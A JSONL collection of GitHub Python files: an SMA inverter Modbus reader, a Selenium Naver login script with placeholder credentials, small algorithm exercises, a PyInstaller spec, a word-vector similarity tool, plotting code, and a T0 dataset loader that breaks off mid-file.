+{"seq_id":"34714577186","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n# #################################################################################################\r\n## \\brief\r\n# \\details\r\n# \\file GetSmaTotal.py\r\n#\r\n# \\date Erstellt am: 13.03.2020\r\n# \\author moosburger\r\n#\r\n# ######################################################################################\r\n# Version Datum Ticket# Beschreibung\r\n# 1.0 13:03.2020\r\n#\r\n# #################################################################################################\r\n\r\n# #################################################################################################\r\n# # Debug Einstellungen\r\n# #################################################################################################\r\nbDebug = False\r\nbDebugOnLinux = False\r\n\r\n# Damit kann aus einem andern Pfad importiert werden. Diejenigen die lokal verwendet werden, vor der Pfaderweiterung importieren\r\nif(bDebug == False):\r\n importPath = '/mnt/dietpi_userdata/Common'\r\n\r\nelif(bDebugOnLinux == True):\r\n importPath = '/home/users/Grafana/Common'\r\n\r\nelse:\r\n importPath = 'D:\\\\Users\\\\Download\\\\PvAnlage\\\\Common'\r\n\r\n# #################################################################################################\r\n# # Python Imports (Standard Library)\r\n# #################################################################################################\r\n\r\nfrom pymodbus.client import ModbusTcpClient as ModbusClient\r\nfrom pymodbus.register_read_message import ReadHoldingRegistersResponse\r\nimport ctypes\r\nimport sys\r\nimport os\r\nimport locConfiguration as _conf\r\nfrom datetime import datetime\r\n\r\n# #################################################################################################\r\n# # Python Imports (site-packages)\r\n# #################################################################################################\r\nsys.path.insert(0, importPath)\r\nimport Utils\r\n\r\n# ------------------------------------------------------------------------#\r\n# Define client\r\n# ------------------------------------------------------------------------#\r\n#SMA\r\nmodbus = ModbusClient('192.168.2.43' , port=_conf.MODBUS_PORT)\r\nmodbus.connect()\r\n\r\n# #################################################################################################\r\n# These classes/structures/unions, allow easy conversion between\r\n# modbus 16bit registers and ctypes (a useful format)\r\n# #################################################################################################\r\n\r\n# Two bytes (16 bit) based types\r\nclass x2u8Struct(ctypes.Structure):\r\n _fields_ = [(\"h\", ctypes.c_uint8),\r\n (\"l\", ctypes.c_uint8)]\r\nclass convertChar(ctypes.Union):\r\n _fields_ = [(\"u8\", x2u8Struct),\r\n (\"u16\", ctypes.c_uint16),\r\n (\"s16\", ctypes.c_int16)]\r\n\r\n# Single register (16 bit) based types\r\nclass convert1(ctypes.Union):\r\n _fields_ = [(\"u16\", ctypes.c_uint16),\r\n (\"s16\", ctypes.c_int16)]\r\n\r\n# Two register (32 bit) based types\r\nclass x2u16Struct(ctypes.Structure):\r\n _fields_ = [(\"h\", ctypes.c_uint16),\r\n (\"l\", ctypes.c_uint16)]\r\nclass convert2(ctypes.Union):\r\n _fields_ = [(\"float\", ctypes.c_float),\r\n (\"u16\", x2u16Struct),\r\n (\"sint32\", ctypes.c_int32),\r\n (\"uint32\", ctypes.c_uint32)]\r\n\r\n# Four register (64 bit) based types\r\nclass x4u16Struct(ctypes.Structure):\r\n _fields_ = [(\"hh\", ctypes.c_uint16),\r\n (\"hl\", ctypes.c_uint16),\r\n (\"lh\", ctypes.c_uint16),\r\n (\"ll\", ctypes.c_uint16)]\r\nclass convert4(ctypes.Union):\r\n _fields_ = [(\"u16\", x4u16Struct),\r\n (\"sint64\", ctypes.c_int64),\r\n (\"uint64\", ctypes.c_uint64)]\r\n\r\n# #################################################################################################\r\n# # Funktionen\r\n# # Prototypen\r\n# # if __name__ == '__main__':\r\n# #################################################################################################\r\n\r\n# #################################################################################################\r\n# # Classes: PrepareDate\r\n## \\details#\r\n#\r\n# #################################################################################################\r\nclass TotalSmaEnergy():\r\n\r\n\r\n# #################################################################################################\r\n# # Funktion: ' Constructor '\r\n## \\details Die Initialisierung der Klasse KeepAlive\r\n# \\param[in] self der Objectpointer\r\n# \\param[in] interval\r\n# \\param[in] CallBack\r\n# \\return -\r\n# #################################################################################################\r\n def __init__(self, logger):\r\n\r\n self.log = logger.getLogger('SmaEnergy')\r\n self.log.info(\"gestartet\")\r\n\r\n self.Data = {}\r\n\r\n# # Ende Funktion: ' Constructor ' ################################################################\r\n\r\n# #################################################################################################\r\n# # Funktion: ' Destructor '\r\n# #################################################################################################\r\n #def __del__(self):\r\n\r\n# # Ende Funktion: ' Destructor ' #################################################################\r\n\r\n# #################################################################################################\r\n# # Funktion: '_FetchSmaTotal '\r\n## \t\\details\r\n# \\param[in]\r\n# \\return -\r\n# #################################################################################################\r\n def FetchSmaTotal(self, WriteOut):\r\n\r\n SunSpecUnit = 126\r\n SmaUnit = 3\r\n SmaProfil = ()\r\n\r\n try:\r\n if (WriteOut == False):\r\n SmaProfil = ((' Tagesertrag',30535, 2,0, SmaUnit),)\r\n else:\r\n SmaProfil = (\r\n (' Seriennummer',40053,16,0, SunSpecUnit),\r\n (' Softwarepaket',40045, 8,0, SunSpecUnit),\r\n (' Geraetetyp1',40240, 1,0, SunSpecUnit),\r\n (' Geraetetyp2',40037, 8,0, SunSpecUnit),\r\n (' Gesamtertrag1',40303, 4,0, SunSpecUnit),\r\n (' Gesamtertrag2',40210, 2,40212, SunSpecUnit),\r\n (' Leistung',40200, 1,40201, SunSpecUnit),\r\n (' Ac1 Spannung',40196, 1,40199, SunSpecUnit),\r\n (' Ac2 Spannung',40197, 1,40199, SunSpecUnit),\r\n (' Ac3 Spannung',40198, 1,40199, SunSpecUnit),\r\n (' Ac1 Strom',40189, 1,40192, SunSpecUnit),\r\n (' Ac2 Strom',40190, 1,40192, SunSpecUnit),\r\n (' Ac3 Strom',40191, 1,40192, SunSpecUnit),\r\n ('Innentemperatur',40219, 1,0, SunSpecUnit),\r\n (' Dc1 Spannung',40642, 1,40625, SunSpecUnit),\r\n (' Dc2 Spannung',40662, 1,40625, SunSpecUnit),\r\n (' Dc1 Strom',40641, 1,40624, SunSpecUnit),\r\n (' Dc2 Strom',40661, 1,40624, SunSpecUnit),\r\n (' Dc1 Leistung',40643, 1,40626, SunSpecUnit),\r\n (' Dc2 Leistung',40663, 1,40626, SunSpecUnit),\r\n (' Betriebsstatus',40224, 1,0, SunSpecUnit),\r\n (' Ereignisnummer',40226, 2,0, SunSpecUnit),\r\n (' MAC-Adresse',40076, 4,0, SunSpecUnit),\r\n (' IP-Adresse',40097, 8,0, SunSpecUnit),\r\n #(' Gesamtertrag3',30529, 2,0, SmaUnit),\r\n (' Tagesertrag',30535, 2,0, SmaUnit)\r\n )\r\n\r\n sunSpecData = {}\r\n\r\n self.Data['Now'] = datetime.now()\r\n\r\n for dataSet in SmaProfil:\r\n UNIT = dataSet[4]\r\n\r\n adrOfs = 0\r\n if (SunSpecUnit == UNIT):\r\n adrOfs = 1\r\n\r\n des = dataSet[0]\r\n adr = dataSet[1] - adrOfs\r\n leng = dataSet[2]\r\n skr = dataSet[3] - adrOfs\r\n Translate = 0\r\n TranslateScale = 0\r\n\r\n raw = 0\r\n sk = 0\r\n val = ''\r\n if (skr > 0):\r\n sk = modbus.read_holding_registers(skr, 1, slave=UNIT)\r\n\r\n raw = modbus.read_holding_registers(adr, leng, slave=UNIT)\r\n if isinstance(raw, ReadHoldingRegistersResponse):\r\n if (leng == 16):\r\n Translate = convertChar()\r\n for chrGrp in raw.registers:\r\n if (chrGrp == 0):\r\n break\r\n Translate.u16 = chrGrp\r\n val = val + chr(Translate.u8.l) + chr(Translate.u8.h)\r\n\r\n elif (leng == 8):\r\n Translate = convertChar()\r\n for chrGrp in raw.registers:\r\n if (chrGrp == 0):\r\n break\r\n Translate.u16 = chrGrp\r\n val = val + chr(Translate.u8.l) + chr(Translate.u8.h)\r\n\r\n elif (leng == 4):\r\n Translate=convert4()\r\n Translate.u16.hh = raw.registers[3]\r\n Translate.u16.hl = raw.registers[2]\r\n Translate.u16.lh = raw.registers[1]\r\n Translate.u16.ll = raw.registers[0]\r\n val = Translate.uint64\r\n\r\n elif (leng == 2):\r\n Translate=convert2()\r\n Translate.u16.h = raw.registers[1]\r\n Translate.u16.l = raw.registers[0]\r\n val = Translate.uint32\r\n\r\n else:\r\n Translate=convert1()\r\n Translate.u16=raw.registers[0]\r\n TranslateScale=convert1()\r\n TranslateScale.u16 = 0\r\n\r\n if (skr > 0):\r\n TranslateScale.u16 = sk.registers[0]\r\n\r\n val = Translate.s16*(10**(TranslateScale.s16))\r\n\r\n if (Translate.u16 == 0xFFFF) or (Translate.u16 == 0x8000):\r\n val = 0\r\n\r\n sunSpecData[str(adr + adrOfs)] = val\r\n\r\n if ((adr + 1) == 40303): # Gesamtertrag1\r\n timestamp = \"{}.{}.{} {}:{} {}\".format(self.Data['Now'].strftime(\"%d\"), self.Data['Now'].strftime(\"%m\"), self.Data['Now'].strftime(\"%Y\"), self.Data['Now'].strftime(\"%H\"), self.Data['Now'].strftime(\"%M\"), self.Data['Now'].strftime(\"%S\"))\r\n datStream = \"TimeStamp: {} Total energy: {} Wh\\n\".format(timestamp, val)\r\n\r\n strFolder = \"{}{}\".format(_conf.EXPORT_FILEPATH, self.Data['Now'].strftime(\"%Y\"))\r\n fileName = \"{}/SmaTotalEnergy.log\".format(strFolder)\r\n\r\n if (not os.path.exists(strFolder)):\r\n os.mkdir(strFolder)\r\n # chmod sendet Oktal Zahlen, Python2 0 davor, python 3 0o\r\n os.chmod(strFolder, 0o777)\r\n\r\n Utils._write_File(fileName , datStream, \"a\")\r\n modbus.close()\r\n\r\n # Sma loescht die Tagesleistung um Mitternacht...\r\n if (sunSpecData['30535'] > 0):\r\n self.Data['TodayWh'] = sunSpecData['30535']\r\n\r\n if (WriteOut == True):\r\n self.Data['RelVer'] = sunSpecData['40045'].replace('\\00', '/00')\r\n self.Data['host'] = sunSpecData['40097']\r\n self.Data['Status'] = sunSpecData['40224']\r\n #self.Data['StatusTxt'] = sunSpecData['aaa']\r\n self.Data['InvName'] = 'PowerDorf'\r\n self.Data['InvSN'] = sunSpecData['40053']\r\n self.Data['InvModel'] = 'Sunnboy 3.0'\r\n self.Data['InvString'] = '2'\r\n self.Data['InvPhase'] = '1'\r\n self.Data['TotalWh'] = sunSpecData['40303']\r\n #self.Data['TotalWh2'] = sunSpecData['30529']\r\n\r\n self.Data['CC_P'] = sunSpecData['40643'] + sunSpecData['40663']\r\n self.Data['CA_P'] = sunSpecData['40200']\r\n\r\n self.Data['CC1_U'] = sunSpecData['40642']\r\n self.Data['CC1_I'] = sunSpecData['40641']\r\n self.Data['CC1_P'] = sunSpecData['40643']\r\n self.Data['CC1_T'] = sunSpecData['40219']\r\n\r\n self.Data['CC2_U'] = sunSpecData['40662']\r\n self.Data['CC2_I'] = sunSpecData['40661']\r\n self.Data['CC2_P'] = sunSpecData['40663']\r\n self.Data['CC2_T'] = sunSpecData['40219']\r\n\r\n self.Data['CA1_U'] = sunSpecData['40196']\r\n self.Data['CA1_I'] = sunSpecData['40189']\r\n self.Data['CA1_P'] = sunSpecData['40200']\r\n self.Data['CA1_T'] = sunSpecData['40219']\r\n\r\n self.log.info(\"\")\r\n self.log.info(\"TimeStamp : {:%m/%d/%y %H:%M %S}\".format(self.Data['Now']))\r\n self.log.info(\"Comm software : SMA v%s\" % (self.Data['RelVer']))\r\n self.log.info(\"Comm host : %s\" % self.Data['host'])\r\n self.log.info(\"Inverter Status : %d\" % self.Data['Status'])\r\n self.log.info(\"Inverter Name : %s\" % self.Data['InvName'])\r\n self.log.info(\"Inverter SN : %s\" % self.Data['InvSN'])\r\n self.log.info(\"Inverter Model : %s\" % self.Data['InvModel'])\r\n self.log.info(\"Inverter String : %s\" % self.Data['InvString'])\r\n self.log.info(\"Inverter Phase : %s\" % self.Data['InvPhase'])\r\n self.log.info(\"Total energy : %d Wh\" % self.Data['TotalWh'])\r\n #self.log.info(\"Total energy2 : %d Wh\" % self.Data['TotalWh2'])\r\n self.log.info(\"Today energy : %d Wh\" % self.Data['TodayWh'])\r\n self.log.info(\"DC Power : %5d W\\tAC Power : %5d W\" % (self.Data['CC_P'], self.Data['CA_P']))\r\n self.log.info('DC String 1 : %5.1f V %4.2f A %4d W T= %5.2f C' % (self.Data['CC1_U'], self.Data['CC1_I'], self.Data['CC1_P'], self.Data['CC1_T']))\r\n self.log.info('DC String 2 : %5.1f V %4.2f A %4d W T= %5.2f C' % (self.Data['CC2_U'], self.Data['CC2_I'], self.Data['CC2_P'], self.Data['CC2_T']))\r\n self.log.info('AC Phase 1 : %5.1f V %4.2f A %4d W T= %5.2f C' % (self.Data['CA1_U'], self.Data['CA1_I'], self.Data['CA1_P'], self.Data['CA1_T']))\r\n\r\n except:\r\n for info in sys.exc_info():\r\n self.log.error(\"FetchSmaTotal Fehler: {}\".format(info))\r\n print(\"FetchSmaTotal Fehler: {}\".format(info))\r\n\r\n\r\n # # Ende Funktion: ' _FetchSmaTotal(' ###################################################################\r\n\r\n# # Ende Klasse: ' GetSmaTotal ' ##################################################################\r\n\r\n# # DateiEnde #####################################################################################\r\n","repo_name":"moosburger/EnergieAnzeige","sub_path":"PikoToModBus/Source/GetSmaTotal.py","file_name":"GetSmaTotal.py","file_ext":"py","file_size_in_byte":15567,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"47972255554","text":"from selenium import webdriver\nfrom time import sleep\n\ndriver = webdriver.Chrome('./chromedriver')\ndriver.get('https://nid.naver.com/nidlogin.login')\n\nid = 'id'\npw = 'pw'\n\nsleep(0.5)\ndriver.execute_script(\"document.getElementsByName('id')[0].value=\\'\" + id + \"\\'\")\ndriver.execute_script(\"document.getElementsByName('pw')[0].value=\\'\" + pw + \"\\'\")\n\nsleep(0.5)\ndriver.find_element_by_xpath('//*[@id=\"frmNIDLogin\"]/fieldset/input').click()\n\nsleep(0.5)\ndriver.find_element_by_xpath('//*[@id=\"PM_ID_ct\"]/div[1]/div[2]/div[1]/ul[1]/li[1]/a').click()\ndriver.close()\n","repo_name":"hyuk067/python_study","sub_path":"week_5/naver_login.py","file_name":"naver_login.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"69804221209","text":"import functools\nfrom typing import List\n\n\ndef mincostTickets(days: List[int], costs: List[int]) -> int:\n dayset = set(days)\n durations = [1, 7, 30]\n\n @functools.lru_cache(None)\n def dp(i):\n if i > 365:\n return 0\n elif i in dayset:\n return min(dp(i + d) + c for c, d in zip(costs, durations))\n else:\n return dp(i + 1)\n\n return dp(1)\n","repo_name":"DengBoCong/Algorithm","sub_path":"core/MinimumCostForTickets/MinimumCostForTickets.py","file_name":"MinimumCostForTickets.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"7305744688","text":"\"\"\"Create a function in Python that accepts a single word and returns the number of vowels in that word. In this\nfunction, only a, e, i, o, and u will be counted as vowels — not y.\"\"\"\n\n\ndef vowel_counter(word):\n count = 0\n for i in word:\n if i in [\"a\", \"e\", \"i\", \"o\", \"u\"]:\n count += 1\n return count\n\n\ncounter = vowel_counter(\"aehbgioo\")\n\nprint(counter)","repo_name":"Khanh-Do-devops/portfolio","sub_path":"python/code_academy_4.py","file_name":"code_academy_4.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42231058495","text":"# -*- mode: python -*-\n\nblock_cipher = None\n\n\na = Analysis(['run_game.py'],\n pathex=['/Users/pglandon78/PycharmProjects/RunnableExe/game'],\n binaries=None,\n datas=None,\n hiddenimports=[],\n hookspath=[],\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher)\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n name='run_game',\n debug=False,\n strip=False,\n upx=True,\n console=False )\napp = BUNDLE(exe,\n name='run_game.app',\n icon=None,\n bundle_identifier=None)\n","repo_name":"Luceurre/NightmareEscape","sub_path":"game/run_game.spec","file_name":"run_game.spec","file_ext":"spec","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"4255717946","text":"import numpy as np\nimport math\nfrom numpy import dot\nfrom numpy.linalg import norm\nfrom utilities import utilities\nimport scipy.misc as smp\nfrom tqdm import tqdm\n\nclass CosineSimilarity():\n\n def __init__(self, doc_path, dict_path, key_path=None):\n\n self.doc_path = doc_path\n self.dict_path = dict_path\n self.key_path = None\n\n self.all_dictionary, _ = utilities.readVectorsDict(dict_path)\n self.subset_dictionary = self.subsetDictFromDocs()\n self.key_dictionary = dict()\n\n if key_path:\n self.key_path = key_path\n self.key_dictionary = self.getKeyDictionary()\n\n\n # looks vector up in word2vec dictionary and writes single line to file\n def subsetDictFromDocs(self):\n\n vectors = dict()\n for file in self.doc_path:\n for line in open(file, encoding=\"utf8\"):\n line = utilities.parseLine(line).split()\n if len(line) > 1:\n for word in line:\n if len(word) > 0 and word not in vectors:\n vectors[word] = self.all_dictionary[word]\n\n return vectors\n\n\n # get those keys that exist within the main dictionary, e.g. all colours in the document dictionary\n def getKeyDictionary(self):\n\n key_dict = dict()\n all_keys = utilities.readKeyTable(self.key_path)\n\n for item in self.subset_dictionary:\n if item in all_keys:\n key_dict[item] = self.subset_dictionary[item]\n\n return key_dict\n\n\n # cosine similarity -> angular distance\n def getDistance(self, row, col):\n if row == col:\n return 255\n vec0, vec1 = self.itemToVec(row, col)\n cos_sim = abs(dot(vec0, vec1)) / (norm(vec0) * norm(vec1))\n dist = 1 - math.acos(cos_sim) / math.pi\n return dist\n\n\n # this parsing thing is a nightmare\n def itemToVec(self, key0, key1):\n item0 = self.subset_dictionary[key0]\n item1 = self.subset_dictionary[key1]\n vec0 = np.array(item0).astype(np.float)\n vec1 = np.array(item1).astype(np.float)\n return vec0, vec1\n\n\n # writing the dictionary/matrix to file\n def angularDistancesToFile(self, path):\n\n matrix_header = self.getMatrixHeader()\n\n width = len(matrix_header) + 1\n height = len(matrix_header) + 1\n\n image = np.zeros((height+1, width+1), dtype=np.uint8)\n\n self.defineImageBorders(image, height, width, matrix_header)\n\n for i in tqdm(range(1, height)):\n for j in range(1, width):\n row = matrix_header[i-1]\n col = matrix_header[j-1]\n image[i][j] = self.getDistance(row, col)\n\n img = smp.toimage(image)\n smp.imsave(path, img)\n\n\n def defineImageBorders(self,image, height, width, matrix_header):\n\n image[0][0] = 210\n image[height][width] = 210\n\n for i in range(0, height):\n image[i][height] = 210\n image[height][i] = 210\n\n for i in range(1, height):\n if matrix_header[i-1] in self.key_dictionary:\n image[i][0] = 10\n image[0][i] = 10\n else:\n image[i][0] = 210\n image[0][i] = 210\n\n def getMatrixHeader(self):\n\n matrix_header = list()\n subset_dict_len = len(self.subset_dictionary)\n key_dict_len = len(list(self.key_dictionary.keys()))\n\n count = 0\n\n for key in self.subset_dictionary:\n if key not in self.key_dictionary:\n matrix_header.append(key)\n count += 1\n\n # put the keys (e.g. the colours that we trained on a different corpus) in the middle\n if count == int((subset_dict_len - key_dict_len)/2):\n matrix_header = matrix_header + list(self.key_dictionary.keys())\n\n return matrix_header\n\n\n\n\n\n","repo_name":"AlexRiepenhausen/MastersDissertation","sub_path":"similarity/cosine.py","file_name":"cosine.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"10531065450","text":"import numpy as np # print('numpy imported')\r\nimport os # print('os imported')\r\nimport glob # print('glob imported')\r\n\r\n\r\n###############################\r\n######### Search File #########\r\n###############################\r\ndef filestoanalyse( directory, nameToSearch ):\r\n\tos.chdir(directory) # Change the current working directory\r\n\tlistFile = glob.glob(nameToSearch) # New vector containing string of the nameToSearch in the file\r\n\tnbrFile = np.size(listFile) # The number of video\r\n\r\n\treturn listFile, nbrFile\r\n\r\n\r\n###############################\r\n######### Search File #########\r\n###############################\r\ndef question( sentence ):\r\n\twhile True:\r\n\t\tpartAnswer = input(sentence)\r\n\r\n\t\tif partAnswer == '1' or partAnswer == '0':\r\n\t\t\tbreak\r\n\r\n\treturn partAnswer\r\n\r\n\r\n##########################################\r\n######### Class basic value data #########\r\n##########################################\r\nclass TraitementFile:\r\n\r\n\tdef __init__( self, nFiles, nameFile, basicProperty, numberMovie ):\r\n\t\t# part graph same for all graphic\r\n\t\tself.color_file = np.array(\r\n\t\t\t['navy', 'dodgerblue', 'turquoise', 'paleturquoise', 'darkgreen', 'chartreuse', 'y', 'orange',\r\n\t\t\t 'darkred', 'red', 'purple', 'peru', 'deeppink', 'black', 'dimgray'])\r\n\t\tself.mark_file = np.array(['o', 'x', '^', 's'])\r\n\t\tself.line_style_file = np.array(['-', '--', '-.', ':'])\r\n\r\n\t\t# name data\r\n\t\tself.n_files = nFiles\r\n\t\tself.name_file = nameFile\r\n\t\tself.number_movies = numberMovie\r\n\r\n\t\t# basic data\r\n\t\tself.distance = basicProperty\r\n\r\n\t\t# separation general data\r\n\t\tself.delta_x = 44e-6 # 8 point per movie\r\n\r\n\r\n####################################################################\r\n######### function to create a vector containing all data #########\r\n####################################################################\r\n\r\ndef dicalldata( nameDirectory, nAllFile, sizeAllFile ):\r\n\t### Creation variable with all global data\r\n\tdicAllData = {}\r\n\r\n\tfor i in range(sizeAllFile):\r\n\t\t# Change of directory\r\n\t\tsubDirectoryVideo = '{0}/{1}'.format(nameDirectory, nAllFile[i])\r\n\t\tos.chdir(subDirectoryVideo)\r\n\r\n\t\t# Lecture data\r\n\t\tdatGlobal = np.loadtxt('globalAnalysisData.txt')\r\n\t\tvMax = np.loadtxt('V-R.txt')\r\n\r\n\t\t# remplissage dictionnaire\r\n\t\tdicAllData['data_{}'.format(i)] = datGlobal\r\n\t\tdicAllData['V0_{}'.format(i)] = vMax\r\n\r\n\tos.chdir(nameDirectory)\r\n\r\n\treturn dicAllData\r\n","repo_name":"SylvainLo/Doctorat","sub_path":"these/chapitre 3/plot/basefunction.py","file_name":"basefunction.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39218403839","text":"# encoding: utf-8\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n# def set(context=\"notebook\", style=\"darkgrid\", palette=\"deep\",\n# font=\"sans-serif\", font_scale=1, color_codes=True, rc=None):\nsns.set(context=\"notebook\", style=\"whitegrid\", palette=\"dark\")\n\n# get data\ndata = pd.read_csv(\"Data/data0.csv\", names=[\"square\", \"price\"])\n\n# show data\nsns.lmplot(\"square\", \"price\", data, height=8, fit_reg=False)\nplt.show()\n\n# show data and regression plot\nsns.lmplot(\"square\", \"price\", data, height=8, fit_reg=True)\nplt.show()\n\n# show detail\ndata.info()\n# \n# RangeIndex: 47 entries, 0 to 46\n# Data columns (total 2 columns):\n# square 47 non-null int64\n# price 47 non-null int64\n# dtypes: int64(2)\n# memory usage: 880.0 bytes\n# None\n","repo_name":"Kate-liu/MyTensorFlow","sub_path":"HousingPriceForecastingModel/SingleDataReadAndShow.py","file_name":"SingleDataReadAndShow.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73473386328","text":"import json\nimport os\nimport time\nfrom tracemalloc import start\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\nfrom datasets import load_dataset,load_from_disk,concatenate_datasets\nfrom tqdm import tqdm\nfrom math import ceil\n\nfrom data_utils import exists_lazy, LazyLoader, LazyWriter\nfrom tasks.data_utils import InputExample\n# from tasks.p3.p3 import large_t0_task_dict, T0_TRAIN_TASK_NAME, ori_t0_ls, zj_para_ls\nfrom tasks.p3.p3 import T0_TRAIN_TASK_NAME, REGISTERED_DATA_LIST\nfrom tasks.p3.pvp import P3PVP\nfrom tasks.superglue.dataset import TEST_SET\nfrom utils import print_rank_0\nfrom SwissArmyTransformer import mpu\nfrom promptsource.templates import DatasetTemplates\nfrom special_tasks_config import no_sample_list\n# import random\n\n# test_target = \"super_glue_rte\"\n# read_file_feat_rte = open(\"/share/zongyu/task_embedding/ours/output/all_idxs_sent_super_glue_rte\", \"r\")\n# tpn2idxs = json.load(read_file_feat_rte)\n\n# task_to_prompt_number={'duorc_ParaphraseRC': 55, 'quoref': 54, 'duorc_SelfRC': 54, 'cosmos_qa': 53, \n# 'social_i_qa': 49, 'quail': 47, 'gigaword': 44, 'common_gen': 44, \n# 'samsum': 44, 'cnn_dailymail_3.0.0': 42, 'sciq': 40, 'ropes': 36, 'xsum': 34, 'qasc': 28, 'dream': 25, 'adversarial_qa_droberta': 23, 'adversarial_qa_dbert': 21, 'quartz': 21, 'trec': 21, 'adversarial_qa_dbidaf': 21, 'wiki_qa': 20, 'amazon_polarity': 18, 'paws_labeled_final': 14, 'imdb': 11, 'cos_e_v1.11': 11, 'dbpedia_14': 11, 'ag_news': 10, \n# 'quarel': 10, 'rotten_tomatoes': 10, 'wiqa': 9, 'glue_qqp': 9, \n# 'wiki_hop_original': 9, 'glue_mrpc': 9, 'kilt_tasks_hotpotqa': 8, \n# 'yelp_review_full': 7, 'multi_news': 6, 'wiki_bio': 5, 'app_reviews': 4}\ntask_to_prompt_number = {\n 'ag_news': 7,\n 'app_reviews': 4,\n 'wiki_bio': 5,\n 'cnn_dailymail/3.0.0': 9,\n 'gigaword': 9,\n 'wiki_hop/original': 9,\n 'glue/mrpc': 7,\n 'glue/qqp': 6,\n 'amazon_polarity': 9,\n 'paws/labeled_final': 12,\n 'dbpedia_14': 4,\n 'dream': 5,\n 'kilt_tasks/hotpotqa': 5,\n 'trec': 18,\n 'multi_news': 6,\n 'samsum': 7,\n 'xsum': 10,\n 'imdb': 11,\n 'rotten_tomatoes': 10,\n 'yelp_review_full': 7,\n 'wiki_qa': 11,\n 'common_gen': 9,\n 'adversarial_qa/dbidaf': 5,\n 'adversarial_qa/dbert': 5,\n 'adversarial_qa/droberta': 5,\n 'quoref': 11,\n 'ropes': 12,\n 'duorc/SelfRC': 9,\n 'duorc/ParaphraseRC': 9,\n 'sciq': 5,\n 'quarel': 5,\n 'qasc': 8,\n 'cosmos_qa': 13,\n 'wiqa': 8,\n 'social_i_qa': 6,\n 'quail': 13,\n 'quartz': 8,\n 'cos_e/v1.11': 11\n }\n\n\ndef get_task_prompt_number(prompted_task_name):\n for task_name in list(task_to_prompt_number.keys()):\n cur_task_name = task_name.replace(\"/\", \"_\")\n if prompted_task_name.startswith(cur_task_name):\n return task_to_prompt_number[task_name]\n return None\n\ndef repeat_data(data,repeat_num=None,tgt_num=None):\n if tgt_num:\n repeat_num = ceil(tgt_num / len(data))\n data_ = concatenate_datasets([data for i in range(repeat_num)])\n return data_\n\nclass DataProcessor:\n def __init__(self, args, task_name, tokenizer, lazy_seq2seq_loader=False, **kwargs):\n self.args = args\n self.data_dir = args.multi_cache_dir\n self.max_src_len = self.args.multi_src_seq_length\n self.max_tgt_len = self.args.multi_tgt_seq_length\n self.task_name = task_name\n self.tokenizer = tokenizer\n self.lazy_seq2seq_loader = lazy_seq2seq_loader\n self.max_task_dataset_size = args.max_train_num_per_dataset\n self.loader_scatter = args.loader_scatter\n\n if self.args.t0_upsample_task_names is not None:\n assert len(self.args.t0_upsample_task_names)==len(self.args.t0_upsample_times)\n upsample_ls=[]\n upsample_times={}\n for (dataset_name,upsample_time) in zip(self.args.t0_upsample_task_names,self.args.t0_upsample_times):\n if dataset_name in REGISTERED_DATA_LIST:\n registered_datanames=REGISTERED_DATA_LIST[dataset_name]\n for registered_dataname in registered_datanames:\n upsample_ls.append(registered_dataname)\n upsample_times[registered_dataname]=upsample_time\n else:\n upsample_ls.append(dataset_name)\n upsample_times[dataset_name]=upsample_time\n self.upsample_ls=upsample_ls\n self.upsample_times=upsample_times\n\n def _yield_examples(self, split, dataset):\n raise NotImplementedError\n\n\n \"\"\"\n def get_task_prompt_number(self, task_name):\n for tn in T0_TRAIN_TASK_NAME:\n tn_ = tn.replace(\"/\",\"_\")\n if task_name.startswith(tn_):\n break\n # print(f\"Task Name:{tn}\")\n\n prompt_number = len(DatasetTemplates(tn).all_template_names)\n return prompt_number\n \"\"\"\n\n\n def create_examples(self, split, rng):\n current_idx = mpu.get_data_parallel_rank() % self.loader_scatter\n filepath = os.path.join(self.data_dir, self.task_name, split)\n print(filepath)\n dataset = load_from_disk(filepath)\n\n\n total_number = len(dataset)\n print_rank_0(f\"Original total number: {total_number} | split: {split} | task: {self.task_name}.\")\n\n if total_number > self.max_task_dataset_size and self.task_name not in no_sample_list:\n prompt_number = get_task_prompt_number(self.task_name)\n # assert prompt_number is not None\n current_number = int(self.max_task_dataset_size / prompt_number)\n # rng = random.Random(1234)\n random_list = rng.sample(population=list(range(total_number)),k=current_number)\n else:\n current_number = total_number\n random_list = list(range(total_number))\n # 0412\n # prompt_number = get_task_prompt_number(self.task_name)\n # assert prompt_number is not None\n # current_number = int(self.max_task_dataset_size / prompt_number) # fixed for each dataset\n\n # if current_number >= total_number:\n # cur_data = dataset\n # else:\n # # rng = random.Random(1234)\n # random_list = rng.sample(population=list(range(total_number)),k=current_number)\n # ###\n\n # start_number = int(current_idx / 8 * current_number)\n # end_number = int((current_idx + 1) / 8 * current_number)\n # idx_list = random_list[start_number:end_number] if (start_number != end_number) else [random_list[start_number]]\n # cur_data = dataset.select(idx_list)\n start_number = int(current_idx / self.loader_scatter * current_number)\n end_number = int((current_idx + 1) / self.loader_scatter * current_number)\n idx_list = random_list[start_number:end_number] if (start_number != end_number) else [random_list[start_number]]\n cur_data = dataset.select(idx_list)\n\n # prepare the upsample list in self.__init__\n if self.args.t0_upsample_task_names is not None and self.task_name in self.upsample_ls:\n 